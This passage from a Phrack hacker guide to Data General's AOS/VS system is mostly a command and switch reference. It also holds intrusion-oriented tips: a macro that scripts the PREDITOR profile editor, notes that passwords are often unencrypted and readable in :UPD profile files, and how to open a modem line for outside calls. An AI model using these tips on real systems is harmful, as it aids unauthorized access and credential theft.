  10584.                WRITE/L=?USER.TMP  y
  10585.                WRITE/L=?USER.TMP  %1%
  10586.                WRITE/L=?USER.TMP  n
  10587.                WRITE/L=?USER.TMP
  10588.                WRITE/L=?USER.TMP
  10589.                WRITE/L=?USER.TMP
  10590.                WRITE/L=?USER.TMP
  10591.                WRITE/L=?USER.TMP
  10592.                WRITE/L=?USER.TMP
  10593.                WRITE/L=?USER.TMP
  10594.                WRITE/L=?USER.TMP
  10595.                WRITE/L=?USER.TMP
  10596.                WRITE/L=?USER.TMP
  10597.                WRITE/L=?USER.TMP
  10598.                WRITE/L=?USER.TMP
  10599.                WRITE/L=?USER.TMP
  10600.                WRITE/L=?USER.TMP
  10601.                WRITE/L=?USER.TMP
  10602.                WRITE/L=?USER.TMP
  10603.                WRITE/L=?USER.TMP
  10604.                WRITE/L=?USER.TMP
  10605.                WRITE/L=?USER.TMP
  10606.                WRITE/L=?USER.TMP
  10607.                WRITE/L=?USER.TMP
  10608.                WRITE/L=?USER.TMP
  10609.                WRITE/L=?USER.TMP
  10610.                WRITE/L=?USER.TMP
  10611.                WRITE/L=?USER.TMP
  10612.                WRITE/L=?USER.TMP
  10613.                WRITE/L=?USER.TMP
  10614.                WRITE/L=?USER.TMP
  10615.                WRITE/L=?USER.TMP
  10616.                WRITE/L=?USER.TMP
  10617.                WRITE/L=?USER.TMP
  10618.                WRITE/L=?USER.TMP
  10619.                WRITE/L=?USER.TMP
  10620.                WRITE/L=?USER.TMP
  10621.                WRITE/L=?USER.TMP
  10622.                WRITE/L=?USER.TMP  b
  10623.                PROC/DEF/IOC/IN=?USER.TMP/BLOCK PREDITOR
  10624.                DEL ?USER.TMP
  10625.           [!END]
  10626.      [!END]
  10627. [!END]
  10628.  
  10629. SYSTEM SECURITY
  10630. ~~~~~~~~~~~~~~
  10631.  
  10632. The AOS/VS login is performed in the following manner.
  10633.  
  10634. Every username has a file associated with it in the :UPD directory.
  10635. That file is its profile, and contains the account profile.  Once the
  10636. user has entered a correct username/password pair, the operating system
  10637. loads the user's profile (which includes how much memory and disk space
  10638. the user is allowed to use and the user's allowed privileges) into its
  10639. internal tables.  Several privileges which can be set are the initial
  10640. user directory and initial program that will be executed upon completion
  10641. of the login (eg, the CLI); how many processes the user may run; what
  10642. process priorities the user has; and what SUPER privileges the user has
  10643. (eg, SUPERUSER, SUPERPROCESS).
  10644.  
  10645. As mentioned, if the user has SUPER privileges, he must activate them
  10646. himself (using the right command, or PRIVILEGE if using CLI32).
  10647.  
  10648. An important thing to know about password security is that if the system
  10649. is running Data General's XODIAC networking software, user's might not
  10650. be able to access remote machines through the network if the passwords
  10651. are encrypted.  Therefore, if you are on a XODIAC host, chances are the
  10652. passwords won't be encrypted.  The ACL of the :UPD directory doesn't let
  10653. every user can access it, though.
  10654.  
  10655. Passwords are changed by the user by pressing Ctrl-L immediately after
  10656. entering the password at login.  This will only work for users that have
  10657. the privilege to set their own passwords.  Legal passwords are 6 to 15
  10658. characters.
  10659.  
  10660. This the format (the fields) of the AOS/VS profiles:
  10661.  
  10662. * Password
  10663. * Initial program          To be executed after login
  10664. * Initial IPC file         The LOGON file
  10665. * Initial directory
  10666. * Default user priority    The user's process priority
  10667. * Maximum queue priority   The highest queue priority which the user can
  10668.                            set for a batch job.  The lower the number, the
  10669.                            higher the priority (1-255).
  10670. * Unlimited son processes
  10671. * Maximum son processes    If the above option if off.
  10672. * Disk quota in blocks
  10673. * Logical address space    Allows the user to control the size of the
  10674. (batch)                    logical address space in which his programs
  10675.                            will be executed.  If -1, the system sets.
  10676. * Minimum working set      The minimum number of pages a user can have in
  10677. (batch)                    their active processes.  If -1, the system
  10678.                            determines the value according to the program's
  10679.                            demands.
  10680. * Maximum working set
  10681. (batch)
  10682. * Logical address space
  10683. (non batch)
  10684. * Minimum working set
  10685. (non batch)
  10686. * Maximum working set
  10687. (non batch)
  10688. * Encrypt password
  10689. * Superuser
  10690. * Superprocess
  10691. * Use IPC                  Allows the user to make IPC calls.
  10692. * Use console
  10693. * Use batch
  10694. * Use virtual console      Virtual consoles are created by networked
  10695.                            logins.
  10696. * Use modem                A modem is a console with the characteristic of
  10697.                            /MOD on.
  10698. * Change password
  10699. * Change priority
  10700. * Change type
  10701. * Change username          Allows user to become another username without
  10702.                            actually logging in into that user's profile.
  10703. * Access devices           Allows user to directly issue Assembly
  10704.                            instructions to devices.
  10705. * Create without block     Allows the user to start a son process without
  10706.                            blocking the father process.
  10707. * System manager privileges
  10708. * Access local devices remotely
  10709. * Change addr. space type  Allows 32 bit processes to be called from 16
  10710.                            bit processes (usually on, since there is a
  10711.                            CLI16, but most programs are 32 bit).
  10712. * Change working set limit Allows user to change the working set size of
  10713.                            programs.
  10714. * Comments
  10715.  
  10716. User profiles can be created, deleted, read, and modified from the
  10717. AOS/VS User Profile Editor: PREDITOR.  PREDITOR gives you a prompt
  10718. from which you can read any account and the values of its fields.
  10719. PREDITOR does not, however, display the password field, whether it's
  10720. encrypted or not -- just an indication of what the Encrypt Password
  10721. field is set to.  This is easily overcome, since if you can execute the
  10722. PREDITOR, you can just as well SED the :UPD:USERNAME file and look at
  10723. the password (it's right up there) -- PREDITOR can only be loaded by a
  10724. user that can become Superuser.
  10725.  
  10726. Legal commands for the PREDITOR are Create, Delete, Edit, List,
  10727. Question, Rename, and Use.  They can all be abbreviated to their first
  10728. letter.  When CREATE is called, it first asks if you want to set the
  10729. password, and depending on the answer asks you to enter a password.  It
  10730. then queries about the other fields, giving you three options (usually):
  10731. YES, NO, and NL, the system's default.  DELETE just asks for a
  10732. confirmation on deleting the user, and also his home directory.  EDIT is
  10733. just like CREATE, allowing you to modify any field in the user's profile
  10734. (including the password).  LIST lists the status of every field in the
  10735. profile (by using a template profile, such as '+', one could view every
  10736. user on the system).  QUESTION sets the system defaults, which will later
  10737. be used by CREATE and EDIT.  RENAME allows you to rename a user to another
  10738. name, and USE changes the value in the !DEFAULT variable (your username).
  10739.  
  10740. Logins are handled by a program called EXEC (that's what the EXEC-32
  10741. x.xx.xx.xx part in the login message means).  EXEC just reads the
  10742. username/password and if correct, logs the user in.  After EXEC has been
  10743. completed, the Initial Program from the profile is run.  The commands for
  10744. logins are CONTROL @EXEC DISABLE and ENABLE.  See "The 'EXEC' Program"
  10745. for more information about EXEC.
  10746.  
  10747. When using ENABLE, the console receives login capabilities; apart from
  10748. actually logging in, EXEC will also display :UTIL:LOGON.BANNER.SCREEN.
  10749.  
  10750. ENABLE
  10751. ------
  10752.  
  10753. /ALL      Gives all the consoles the said capabilities.
  10754.  
  10755. /TRIES=x  Sets maximum login tries to x.
  10756.  
  10757. /STOP     This will have the same result as if an operator issued
  10758.           CONTROL @EXEC DISABLE <console> after the maximum login tries
  10759.           was exceeded.
  10760.  
  10761. /CONTINUE
  10762.  
  10763.           Lock console for 10 seconds and then continue.
  10764.  
  10765. /FORCE    Change the other parameters while the console is enabled.
  10766.  
  10767.  
  10768. SYSTEM COMMANDS
  10769. ~~~~~~~~~~~~~~
  10770.  
  10771. Every command has its own switches.  However, all commands accept the
  10772. /1, /2, /L and /Q switches (and /STR=string and /ESTR=string under
  10773. /CLI32).
  10774.  
  10775. /1=ERROR|ABORT|IGNORE|WARNING
  10776. /2=WARNING|ERROR|ABORT|IGNORE
  10777.  
  10778.           Controls what the program will do under a class 1 or 2 error.
  10779.           The first option listed is the default.  ERROR displays
  10780.           "Error: something" and stops command execution.  ABORT aborts
  10781.           the command.  IGNORE ignores the error, and WARNING displays
  10782.           "Warning: something" and continues with the command.
  10783.  
  10784. /L=path   The command will store all its output in 'path'.
  10785.  
  10786. /Q        Display output in columns with on space separating them (an
  10787.           exception to this switch is TYPE).
  10788.  
  10789. /STR=string
  10790. /ESTR=string
  10791.  
  10792.           The command will store its output in the 'string' string
  10793.           variable, which can be viewed later using the STRING command.
  10794.           If there is no output or the command is TYPE or COPY the string
  10795.           is set to null.  /ESTR is for error output, /STR is for
  10796.           regular output.
  10797.  
  10798. Some important AOS/VS commands are listed next.  I included information
  10799. about the DUMP and LOAD commands for information purposes only; as they
  10800. require diskettes, I don't think you'll use them daily.  However, I
  10801. didn't go into diskette handling, etc in detail.
  10802.  
  10803. Sorted alphabetically:
  10804.  
  10805.  
  10806. ACL <path>
  10807. ----------
  10808.  
  10809. ACL is a utility to control the ACL (Access Control List).  An ACL is
  10810. just what is sounds like: it includes a list of usernames and what kind
  10811. of access they have to the file.  ACL used one-letter access code, as
  10812. follows.
  10813.  
  10814.          LETTER                 TYPE/FILE                    TYPE/DIR
  10815.       -----------+---------------------------------+------------------------
  10816.        A(ppend)     Append to a file.                 Create files in the
  10817.                                                       directory or move files
  10818.                                                       into it.
  10819.  
  10820.        E(xecute)   Execute the program.               Allows access to
  10821.                                                       the directory
  10822.                                                       (changing into it,
  10823.                                                       reading, etc).
  10824.  
  10825.        O(wner)      Allows the user to change the ACL or erase the file/dir.
  10826.  
  10827.        R(ead)       Read a file.                      List the files in
  10828.                                                       the directory.
  10829.  
  10830.        W(rite)      Write to a file.                  Create, delete or
  10831.                                                       change ACLs of files
  10832.                                                       in the directory.
  10833.  
  10834. The default ACL for any file is OWARE for the user.
  10835.  
  10836. ACL <path> shows the ACL.  To modify the ACL:
  10837.  
  10838. ACL <path> [user,access] [...]
  10839.  
  10840. Access being one of the OWARE group, for example:
  10841.  
  10842. ACL PHRACK43 HBT,OWARE       (There is NO space between 'username' and
  10843.                              'access'!)
  10844.  
  10845. ACL PHRACK42 HBT,OWARE +,R   (In this example, the '+' template was
  10846. used, '+' standing for all the users.  This means that HBT has full
  10847. access to the file, while the rest of the users can only read it.
  10848. If templates are used, they should be used last, with specific usernames
  10849. before them.)
  10850.  
  10851. Under CLI32 group access is also available in the format of:
  10852.  
  10853. ACL <path> [user:group,access] [...]
  10854.  
  10855. Switches:
  10856.  
  10857. /[BEFORE|AFTER]/[TCR|TLA|TLM]=date and/or time
  10858.  
  10859. /TYPE=type
  10860.  
  10861.           These function just like the same switches in FILESTATUS.
  10862.  
  10863. /D        Use the default settings (OWARE).  Defaults may be changed
  10864.           using DEFCAL.
  10865.  
  10866. /K        Delete ACL - no one but a superuser will be able to access the
  10867.           file.
  10868.  
  10869. /V        Show each file changed.
  10870.  
  10871.  
  10872. BROWSE
  10873. ------
  10874.  
  10875. BROWSE is a program to browse (view, search, scroll in any direction)
  10876. through any number of ASCII or binary files.  While in BROWSE help is
  10877. available by using 'H' or '?'.  BROWSE starts at the end of file and
  10878. lets you move backward (but you can change this).
  10879.  
  10880. No further details are included since BROWSE can run only on CRT
  10881. terminals (the actual terminals the employees usually sit at), and I
  10882. didn't have the pleasure of using one of these (nor do I think will the
  10883. information be of any use).
  10884.  
  10885.  
  10886. CHARACTERISTICS
  10887. ---------------
  10888.  
  10889. CHARACTERISTICS displays or sets the characteristics of a device
  10890. attached to a terminal (not a printer, for example).  To change
  10891. characteristics of a device permanently and not just for the current CLI
  10892. level, you must be PID 2 (local console) or have SYSTEMMANAGER privilege
  10893. on.  To this, you must use EXEC first to DISABLE the device, use
  10894. CHARACTERISTICS, and then use EXEC to ENABLE the device (see the section
  10895. titled "The 'EXEC' Program").  The CHARACTERISTICS switch will be
  10896. /DEFAULT/[default device characteristics] device.  "device" for example,
  10897. is @CON100.
  10898.  
  10899. CHARACTERISTICS switches look like this:
  10900. CHARACTERISTICS /[ON|OFF]/SWITCH.  It's self explanatory.
  10901.  
  10902. /8BT
  10903.  
  10904.           Interpret all 8 bits of an ASCII char as data.  (For use with
  10905.           8 bit character sets, of course.)
  10906.  
  10907. /16B      For Asian language translation.
  10908.  
  10909. /4010I    Device is a DG model 4010I terminal.
  10910.  
  10911. /6012     Device is a DG model 6012 terminal.
  10912.  
  10913. /605X     Device is a DG DASHER model 6052, 6053, D210 or D211 terminal.
  10914.  
  10915. /6130     Device is a DG DASHER model 6130, D410 or D460 terminal.
  10916.  
  10917. /ACC      Line requires modem access control (only users with the Use
  10918.           Modem privilege may login).
  10919.  
  10920. /AUTOBAUD
  10921.  
  10922.           The system will automatically determine the terminal's baud
  10923.           (it's bps, damnit!) rate.
  10924.  
  10925. /BAUD=b
  10926.  
  10927.           Sets a device's bps rate to b.  b can be 45.5, 50, 75, 110,
  10928.           134.5, 150, 300, 600, 1200, 1800, 2400, 3600, 4800, 7200,
  10929.           9600, 19200, 38400.
  10930.  
  10931. /BREAK=[BMOB|CAOB|CBOB|CFOB|DCOB]
  10932.  
  10933.           How the system will respond to a BREAK:
  10934.           BMOB (default) Clears binary mode and restore normal character
  10935.                          handling
  10936.           CAOB           Issues Ctrl-C Ctrl-A
  10937.           CBOB           Issues Ctrl-C Ctrl-B
  10938.           CFOB           Issues Ctrl-C Ctrl-F
  10939.           DCOB           Disconnect user
  10940.  
  10941. /CALLOUT  Allow host initiated calls (outside calls).
  10942.  
  10943. /CHARLEN=[5|6|7|8]
  10944.  
  10945.           Character length in bits, *including* stop bit.
  10946.  
  10947. /CONTYPE=connection type
  10948.  
  10949.           Connection types are:
  10950.           BITMAPPED      Windowing terminal
  10951.           DIRECT         Standard connection
  10952.           PAD            From PAD hardware
  10953.           PBX            From a PBX controller
  10954.           PCVT           From a DG/PC*i controller
  10955.           TERMSERVER     From terminal server hardware
  10956.           TELNET         Through telnet
  10957.           VIRTUAL        Through a virtual terminal
  10958.  
  10959. /CPL=[8-255]
  10960.  
  10961.           The maximum number of characters per line.
  10962.  
  10963. /CTD      Disconnect line if the user doesn't respond to login after a
  10964.           while.
  10965.  
  10966. /DEFAULT  Displays the default characteristics of the terminal.
  10967.  
  10968. /DKHW     If OFF, and /16B and /8BT are on, enable support for Chinese
  10969.           characters.
  10970.  
  10971. /EB0      Specify the echoing of control characters.
  10972. /EB1      When both off, nothing is echoed.
  10973.           When EB0 is on and EB1 is off, echos ^char.
  10974.           When EB0 is off, and EB1 is on, echos exactly what was entered.
  10975.  
  10976. /EOL      Don't output a newline if the number of characters in input
  10977.           has exceeded the line length.
  10978.  
  10979. /ESC      Interpret an escape as a Ctrl-C Ctrl-A interrupt.
  10980.  
  10981. /FF       Output a formfeed when the device opens.
  10982.  
  10983. /G1G0     Enables the G1G0 character set (Taiwanese characters).  /16B
  10984.           and /8BT must also be ON.
  10985.  
  10986. /HARDCOPY Device is a printing terminal.
  10987.  
  10988. /HDPX     Provide half duplex support for a modem line.
  10989.  
  10990. /HIFC     Use CTS/RTS input flow control, cannot be on if /HDPX or /MOD are
  10991.           on.
  10992.  
  10993. /HOFC     Use CTS/RTS output flow control.
  10994.  
  10995. /IFC      Enables XON/XOFF to control terminal input (the Ctrl-S/Ctrl-Q
  10996.           control characters).
  10997.  
  10998. /LEVEL=x  Sets characteristics to the same as those in CLI level #x.
  10999.  
  11000. /LPP=[4-255]
  11001.  
  11002.           The number of lines per page.
  11003.  
  11004. /MDUA     Allows direct access to the modem on the line (/MOD must also
  11005.           be set).  You can then use ?WRITE to send commands to the
  11006.           modem.  See the section titled "CLI Macro Programming".
  11007.  
  11008. /MOD      Use modem interface on this line.
  11009.  
  11010. /MRI      Monitor line for rings.
  11011.  
  11012. /NAS      Device is non ANSI standard.
  11013.  
  11014. /NLX      Enable Asian natural language translation.  /16B and /8BT must
  11015.           also be ON.
  11016.  
  11017. /NRM      Suppress messages (from SEND) not sent from PID 2 (something
  11018.           like "mesg n" in Unix).
  11019.  
  11020. /OFC      XON/XOFF output flow control.
  11021.  
  11022. /OTT      Convert characters sequence "~}" to an escape (use with VT100
  11023.           emulation, or how will you escape).
  11024.  
  11025. /P        Sets the characteristics to be the same as those used on the
  11026.           previous CLI level.
  11027.  
  11028. /PARITY=[ODD|EVEN|NONE]
  11029.  
  11030.           Default is NONE.
  11031.  
  11032. /PM       Enable page mode, which pauses output every LPP lines (as set
  11033.           with the /LPP switch, default is 24).  Ctrl-Q resumes.
  11034.  
  11035. /RESET    Reset characteristics to the default value.
  11036.  
  11037. /RTSCD    Check carrier detect before processing RTS signals.  /HDPX
  11038.           must be ON.
  11039.  
  11040. /SFF      Simulate formfeeds.
  11041.  
  11042. /SMCD     Ignore carrier detect on modem lines.  /MOD and must be ON,
  11043.           and this must be set if /HPDX is ON.
  11044.  
  11045. /ST       Simulate a tab every 8 columns.
  11046.  
  11047. /STOPBITS=[1|1.5|2]
  11048.  
  11049. /TCC=[time to wait for a carrier detect signal after the modem connect]
  11050.  
  11051.           Default is 40000 ms.
  11052.  
  11053. /TCD=[time to wait for a carrier detect signal to return after it drops]
  11054.  
  11055.           Default is 5000 ms.
  11056.  
  11057. /TDW=[delay between modem connect and the first I/O]
  11058.  
  11059.           Default is 2000 ms.
  11060.  
  11061. /THC=[the amount of time after disconnecting for the modem to settle]
  11062.  
  11063.           Default is 10000 ms.
  11064.  
  11065. /TLT=[time to wait between sending the last char and dropping RTS]
  11066.  
  11067.           Default is 0 ms.  /HPDX must be ON.
  11068.  
  11069. /TO       Enable timeouts.
  11070.  
  11071. /UCO      Convert lowercase input to uppercase when displaying it.
  11072.  
  11073. /ULC      Accept both uppercase and lowercase as input.
  11074.  
  11075. /WRP      Wrap on a long line.
  11076.  
  11077. /XLT      Enable VT100 terminal emulation.
  11078.  
  11079. Knowledge is knowledge, but AT&T is something different.  Here is how
  11080. you'd open a modem line for calling out:  (You must be SYSTEMMANAGER)
  11081.  
  11082. CLEARDEVICE/RXON @CON999
  11083. CONTROL @EXEC DISABLE @CON999
  11084. CHARACTERISTICS/ON/MOD/MDUA/CTD/CALLOUT @CON999
  11085. CONTROL @EXEC ENABLE @CON999
  11086. ((And here's how you put it back))
  11087. CLEARDEVICE/RXON @CON999
  11088. CONTROL @EXEC DISABLE @CON999
  11089. CHARACTERISTICS/DEF @CON999
  11090. CONTROL @EXEC ENABLE @CON999
  11091.  
  11092.  
  11093. CLEARDEVICE <device>
  11094. --------------------
  11095.  
  11096. You must be PID 2 (local console) or have SYSTEMMANAGER privileges
  11097. turned on to use CLEARDEVICE on a terminal that isn't yours.  <device>
  11098. must be a terminal line (eg, @CON100).
  11099.  
  11100. /RXON     Simulates a XON character from the device.
  11101.  
  11102. /SBREAK   Sends a break character to the device.
  11103.  
  11104.                               ==Phrack Magazine==
  11105.  
  11106.                  Volume Four, Issue Forty-Four, File 15 of 27
  11107.  
  11108. ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
  11109.  
  11110.                  A Guide to Data General Corporation's
  11111.  
  11112.                              AOS/VS System
  11113.                                 PART II
  11114.  
  11115.                              by Herd Beast
  11116.  
  11117.  
  11118. CONINFO [console]
  11119. -----------------
  11120.  
  11121. CONINFO shows information about a console to the user.  Without an
  11122. argument, it gives the user information about his console.  With a
  11123. parameter, and if the user has SYSTEMMANAGER privilege turned on, it
  11124. gives information about the console specified as argument.  The
  11125. information gives changes depending as to how the console is connected:
  11126.  
  11127.                  CONNECTION                   INFORMATION
  11128.           ------------------------+---------------------------------
  11129.           ITC/LTC over TCP/IP       Device code, engine number,
  11130.                                     line number, IP address,
  11131.                                     port number.
  11132.  
  11133.           ITC/LTC over XNS          Device code, engine number,
  11134.                                     line number, CS/200 ethernet
  11135.                                     address.
  11136.  
  11137.     ((No remote address if no connection exists (on both of them).))
  11138.  
  11139.           ITC/PVC                   Device code, engine number,
  11140.                                     engine address, line number,
  11141.                                     line address OR an ASCII string if
  11142.                                     the PVC type is NAME.
  11143.  
  11144.           Telnet                    Line number, IP address, port.
  11145.                                     Only line number if there's no current
  11146.                                     connection.
  11147.  
  11148.           IACs                      Device code, engine number, line
  11149.                                     number, modem flag.
  11150.  
  11151.           Duarts                    Device code, engine number, line
  11152.                                     number, CON0 flag.
  11153.  
  11154.           TTI/TTO Opcon             Device code, engine number, line
  11155.                                     number, CON0 flag.
  11156.  
  11157.  
  11158. CREATE <pathname>
  11159. -----------------
  11160.  
  11161. CREATE creates a file (TXT or UDF).  CREATE/LINK creates file links.
  11162.  
  11163. /DATASENSITIVE
  11164.  
  11165.           Creates a file with a data sensitive record format.
  11166.  
  11167. /DIRECTORY
  11168.  
  11169.           Creates a directory.
  11170.  
  11171. /DYNAMIC
  11172.  
  11173.           Creates a file with a dynamic record format.
  11174.  
  11175. /ELEMENTSIZE=x
  11176.  
  11177.           Sets the minimum amount of space by which a file can grow in 512
  11178.           byte blocks.
  11179.  
  11180. /FIXED=x
  11181.  
  11182.           Creates a file with a fixed length record format, with a
  11183.           length of x.
  11184.  
  11185. /HASHFRAMESIZE=x
  11186.  
  11187.           Sets the unit into which the system divides the directory for file
  11188.           access to x.  The default is 7.  The best formula for this is: the
  11189.           nearest prime number (up to 157, the maximum) of the number of
  11190.           files / 20.
  11191.  
  11192. /I
  11193.  
  11194.           Inserts typed text at @INPUT as the contents of the file.  The
  11195.           input ends when a single ')' followed by a Return is typed.
  11196.  
  11197. /INDEXLEVELS=x
  11198.  
  11199.           Sets the maximum number of data elements the file can hold to x.
  11200.  
  11201. /LINK
  11202.  
  11203.           Creates a linked file to the second argument.  For example, to link
  11204.           MODEM.CLI with :UTIL:NET:MODEM.CLI, use CREATE/LINK MODEM.CLI
  11205.           :UTIL:NET:MODEM.CLI.
  11206.  
  11207. /M
  11208.  
  11209.           Takes the contents of the file from a macro that follows.  The
  11210.           input ends when a single ')' followed by a Return is typed.
  11211.  
  11212. /MAXSIZE=x
  11213.  
  11214.           Creates a control point directory of x*512 bytes (a disk block).
  11215.  
  11216. /TYPE=t
  11217.  
  11218.           Creates a file of type t.  Where t is either the right decimal
  11219.           number or the right 3 letter mnemonic (see the section titled
  11220.           "System Structure").
  11221.  
  11222. /VARIABLE
  11223.  
  11224.           Creates a file with variable record formats.
  11225.  
  11226.  
  11227. DELETE <file>
  11228. -------------
  11229.  
  11230. Deletes file.  The opposite of CREATE.
  11231.  
  11232.  
  11233. DUMP <file> [path]
  11234. ------------------
  11235.  
  11236. DUMP dumps file from the current directory to a file.  Such files can be
  11237. a diskette or a magnetic tape.  [path] is the template for the files to
  11238. dump -- if it doesn't exist, everything will be dumped.  DUMP isn't
  11239. compatible with Unix; AOS/VS has a TAR command for dumping file for use
  11240. in Unix.
  11241.  
  11242. /[AFTER|BEFORE]/[TLA|TLM|TCR]=date and/or time
  11243.  
  11244. /TYPE=[\]type
  11245.  
  11246.           These switches works just like the one in FILESTATUS.
  11247.  
  11248. /BUFFERSIZE=x
  11249.  
  11250.           Sets the buffer to x (x is a multiply of 1024).  x is given in
  11251.           bytes, but if specified as xK it reads a kilobytes (1 kilobyte
  11252.           is 1024 bytes).  The larger the buffer, the more data fits on
  11253.           the tape.
  11254.  
  11255. /DENSITY=[800|1600|6250|ADM|LOW|MEDIUM|HIGH]
  11256.  
  11257.           The numbers are for bits per inch.  ADM means Automatic
  11258.           Density Matching.  If one of the other values is used, there's
  11259.           a possibility that it won't fit in another tape unit (unit X's
  11260.           LOW value isn't the same as unit Y's).
  11261.  
  11262. /FLAT
  11263.  
  11264.           Eliminates the directory structure.  Otherwise, DUMP keeps the
  11265.           directory tree when dumping.
  11266.  
  11267. /IBM
  11268.  
  11269.           Writes to a tape that an IBM format label, created using
  11270.           LABEL/I.
  11271.  
  11272. /L[=pathname]
  11273.  
  11274.           Lists filenames dumped in pathname, or in @LIST.  (See the
  11275.           command after LOAD, 'LISTFILE').
  11276.  
  11277. /NACL     Don't dump ACLs, so that when reloading, the default ACL will
  11278.           be created.
  11279.  
  11280. /RETAIN=x
  11281.  
  11282.           Sets the retention period.  The dumpfile cannot be overwritten
  11283.           until x days have passed.
  11284.  
  11285. /SEQUENTIAL
  11286.  
  11287.           Will not rewind the tape after completing the dump.
  11288.  
  11289. /V        Verify the dump by listing the dumped files.
  11290.  
  11291.  
  11292. FED
  11293. ---
  11294.  
  11295. FED (moohaha), is a program, not a CLI command.  FED stands for File
  11296. Editor Utility, and it lets you examine locations in disk files and
  11297. modify them.  FED is run as XEQ FED [path].  The FED inner prompt is
  11298. '_'.
  11299.  
  11300. FED has internal keywords.  They are run by using ESC <keyword> (if you
  11301. can't use escape, try setting CHAR/ON/XLT/OTT and use "~}").
  11302.  
  11303. To understand FED well, you must be familiar with the DEBUG command and
  11304. some Assembly, which seems to me is beyond the scope of this file.  So
  11305. if you do know what you're doing, look DEBUG up.
  11306.  
  11307. C    Run a CLI under FED.
  11308. DIS  Change display mode
  11309. G    Examine/modify ring register
  11310. H    Help
  11311. I    Define/list temporary symbols
  11312. J    Delete temporary symbols
  11313. M    Examine/modify input radix
  11314. MEM  Examine/modify file locations
  11315. S    Search disk locations
  11316. T    Examine/modify display mode
  11317. X    Enable/disable symbol table
  11318. Y    Enable/disable logging to a file
  11319. Z    Exit FED
  11320. ?    Display verbose error messages
  11321.  
  11322. /I=file   Use the commands in filename for the editing session.
  11323.  
  11324. /L=file   Save all FED commands/responses to file.
  11325.  
  11326. /S=file   Use file as the symbol table file.
  11327.  
  11328. /N        Don't use a symbol table file.
  11329.  
  11330. /P        Treat the disk file as a program file.
  11331.  
  11332. /R        Open for read-only.
  11333.  
  11334. /U        Treat the disk data as a user data file.
  11335.  
  11336. /X        Treat the disk file as an OS file.
  11337.  
  11338.  
  11339. LOAD <file> [path]
  11340. ------------------
  11341.  
  11342. LOAD restores files that were dumped.  If LOAD is invoked from CLI32, a
  11343. macro calls the DUMP_II program, which is a more advanced version of
  11344. DUMP.  If [path] is omitted, the entire dumpfile is loaded into the
  11345. current directory (with its directory tree).
  11346.  
  11347. /[AFTER|BEFORE]/[TLA|TLM|TCR]=date and/or time
  11348.  
  11349. /TYPE=[\]type
  11350.  
  11351.           These switches function the same as in FILESTATUS.
  11352.  
  11353. /BUFFERSIZE=x
  11354.  
  11355. /DENSITY=density was already set with DUMP, use ADM if at all
  11356.  
  11357. /FLAT
  11358.  
  11359. /IBM
  11360.  
  11361. /L[=path]
  11362.  
  11363. /NACL
  11364.  
  11365. /SEQUENTIAL
  11366.  
  11367. /V
  11368.  
  11369.           These switches function the same as in DUMP, only in the
  11370.           reverse direction (for example, /NACL won't load the
  11371.           dumpfile's ACL and create new default --  username,OWARE
  11372.           -- ACLs.
  11373.  
  11374. /DELETE
  11375.  
  11376.           Delete any existing file with matching name.
  11377.  
  11378. /N        Don't load, just list files in dumpfile.
  11379.  
  11380. /Q        Squeeze console messages and file lists (don't use tabs and
  11381.           more than one space).
  11382.  
  11383.  
  11384. LISTFILE [path]
  11385. ---------------
  11386.  
  11387. LISTFILE sets the @LIST file (see the section titled "System Structure"
  11388. for details).  In short, program uses the generic file name @LIST, it
  11389. will use the files specified through LISTFILE instead.
  11390.  
  11391. /G        Sets the LISTFILE to the generic @LIST.
  11392.  
  11393. /K        Sets the LISTFILE to null.
  11394.  
  11395. /LEVEL=x  Sets the LISTFILE to that of level number x LISTFILE.
  11396.  
  11397. /P        Sets the LISTFILE to the previous environment setting.
  11398.  
  11399.  
  11400. PASSWORD
  11401. --------
  11402.  
  11403. Only exists with CLI32.
  11404.  
  11405. (For more information, see the section titled "System Structure").
  11406.  
  11407. /CHANGE   Change the current CLI password.
  11408.  
  11409. /PROMPT
  11410. /NOPROMPT
  11411.  
  11412.           If /PROMPT, the user will have to enter his password when
  11413.           using LOCK (so he can't LOCK the console without a password).
  11414.           Otherwise, automatically locks the console when LOCK is
  11415.           executed.
  11416.  
  11417. /READ=path
  11418. /WRITE=path
  11419.  
  11420.           /WRITE Encrypts the CLI password and writes it to the file
  11421.           [path].  When /READ is issued, the encrypted password is read
  11422.           from the file.  When a password check needs to be done, the
  11423.           password entered is encrypted and the encrypted forms are
  11424.           compared.  This way, a "PASSWORD/READ=PWD" in the LOGON file
  11425.           can set the CLI password automatically at logon.
  11426.  
  11427. I am not sure of the way that the password in encrypted when being saved
  11428. with /WRITE.  Nor, for that matter, do I have any more information about
  11429. the way the login passwords are encrypted in the profiles (when and if
  11430. they are).
  11431.  
  11432. Beware of situation where PWD, for example, has the string "qwerty" in
  11433. it, and you type PASSWORD/READ=qwerty.  If you use LOCK, the terminal is
  11434. locked forever, since "qwerty" is assumed to be the encrypted form.
  11435.  
  11436.  
  11437. PROCESS <path>
  11438. --------------
  11439.  
  11440. Creates a son process to run the program in <path>.  <path> is assumed
  11441. to end with .PR, and only then to be just <path>.
  11442.  
  11443. /ACCESSDEVICES
  11444.  
  11445.           Allows the process to define and access I/O devices.  Requires
  11446.           the Access Devices privilege as defined in the profile.
  11447.  
  11448. /BLOCK
  11449.  
  11450.           Blocks the father CLI until the process terminates.  If the
  11451.           CLI isn't blocked, you can use CHECKTERMS to display the
  11452.           process' termination message when it terminates.
  11453.  
  11454. /BREAK
  11455.  
  11456.           Creates a break file (.BRK) if the process has an error or
  11457.           terminates because of one.  If EXEC is TERMINATEd instead of
  11458.           HALTed using the HALT 'EXEC' command, it will create a .BRK
  11459.           file.
  11460.  
  11461. /BSON
  11462.  
  11463.           Blocks the son process until freed with UNBLOCK.
  11464.  
  11465. /CHLOGICALTYPE
  11466.  
  11467.           Allows the process to change its logical type (16 bit or 32
  11468.           bit).  Requires the Change Logical Type privilege, which, as
  11469.           mentioned in "System Security" is usually on.
  11470.  
  11471. /CHPRIORITY
  11472.  
  11473.           Allows the process to change its priority.  Requires Change
  11474.           Priority privilege.
  11475.  
  11476. /CHTYPE
  11477.  
  11478.           Allows the process to create any other type of process and
  11479.           change its own process type.  Requires Change Type privilege.
  11480.  
  11481. /CHUSERNAME
  11482.  
  11483.           Allows the process to create a new process with a different
  11484.           username than its own.  Requires Change Username privilege.
  11485.  
  11486. /CHWSS
  11487.  
  11488.           Allows the process to change its working set size.  Requires
  11489.           Change Working Setsize privilege.
  11490.  
  11491. /CONSOLE[=console]
  11492.  
  11493.           Makes the new process' console the same as that of the
  11494.           father's console, or [console].
  11495.  
  11496. /CPU=x    Limits CPU time for x seconds.
  11497.  
